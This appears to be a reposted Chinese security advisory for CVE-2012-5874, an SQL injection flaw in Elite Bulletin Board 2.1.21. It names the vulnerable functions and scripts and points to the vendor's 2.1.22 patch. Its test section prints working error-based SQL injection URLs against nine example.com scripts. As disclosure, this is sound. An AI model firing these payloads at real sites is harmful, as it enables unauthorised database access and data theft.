发布日期:2012-12-19
更新日期:2012-12-21受影响系统:
Elite Bulletin Board Elite Bulletin Board 2.x
Elite Bulletin Board Elite Bulletin Board 2.x
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 57000
CVE(CAN) ID: CVE-2012-5874Elite Bulletin Board是电子公告版软件。Elite Bulletin 2.1.21及其他版本"/includes/user_function.php"内的"update_whosonline_reg()"和"update_whosonline_guest()"函数没有效过滤URI数据,远程攻击者可以发送特制的HTTP请求到下列脚本,并在应用的数据库内执行任意SQL命令:- checkuser.php
- groups.php
- index.php
- login.php
- quicklogin.php
- register.php
- Search.php
- viewboard.php
- viewtopic.php<*来源:High-Tech Bridge Security Research Lab
链接:https://www.htbridge.com/advisory/HTB23133
http://www.securelist.com/en/advisories/51622
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!http://www.example.com/checkuser.php/%27,%28%28select*from%28select%20name_const%28version%28%29,1%29,name_co nst%28version%28%29,1%29%29a%29%29%29%20--%20/http://www.example.com/groups.php/%27,%28%28select*from%28s elect%20name_const%28version%28%29,1%29,name_const %28version%28%29,1%29%29a%29%29%29%20--%20/http://www.example.com/index.php/%27,%28%28select*from%28selec t%20name_const%28version%28%29,1%29,name_const% 28version%28%29,1%29%29a%29%29%29%20--%20/http://www.example.com/login.php/%27,%28%28select*from%28select %20name_const%28version%28%29,1%29,name_const% 28version%28%29,1%29%29a%29%29%29%20--%20/http://www.example.com/quicklogin.php/%27,%28%28select*from%28s elect%20name_const%28version%28%29,1%29,name_c onst%28version%28%29,1%29%29a%29%29%29%20--%20/http://www.example.com/register.php/%27,%28%28select*from% 28select%20name_const%28version%28%29,1%29,name_con st%28version%28%29,1%29%29a%29%29%29%20--%20/http://www.example.com/viewboard.php/%27,%28%28select*from%2 8select%20name_const%28version%28%29,1%29,name_co nst%28version%28%29,1%29%29a%29%29%29%20--%20/?bid=2http://www.example.com/viewtopic.php/%27,%28%28select *from%28select%20name_const%28version%28%29,1%29,name_co nst%28version%28%29,1%29%29a%29%29%29%20--%20/?bid=2&amp;tid=1建议:
--------------------------------------------------------------------------------
厂商补丁:Elite Bulletin Board
--------------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载v2.1.22:http://elite-board.us/Community/viewtopic.php?bid=1&tid=310http://sourceforge.net/projects/elite-board/files/Elite%20Bulletin%20Board%20v2/2.1.22/Foreman 1.0.1版本puppetclass.rb和search.rb脚本多个SQL注入漏洞Microsoft Internet Explorer特制HTML栈溢出拒绝服务漏洞相关资讯 SQL注入漏洞
- 已经 14 岁的 SQL 注入仍然是最危 (08/29/2013 13:12:18)
- TYPO3 WEC 讨论区SQL注入漏洞 (02/22/2013 08:55:37)
- MyBB HM_My Country Flags 插件" (12/28/2012 12:15:26)
| - TYPO3 My quiz and poll Extension (02/22/2013 08:56:41)
- Dedecms v5.7 plusfeedback.php (01/02/2013 08:38:51)
- MyBB Awaylist index.php "id"参数 (12/27/2012 08:29:11)
|
本文评论 查看全部评论 (0)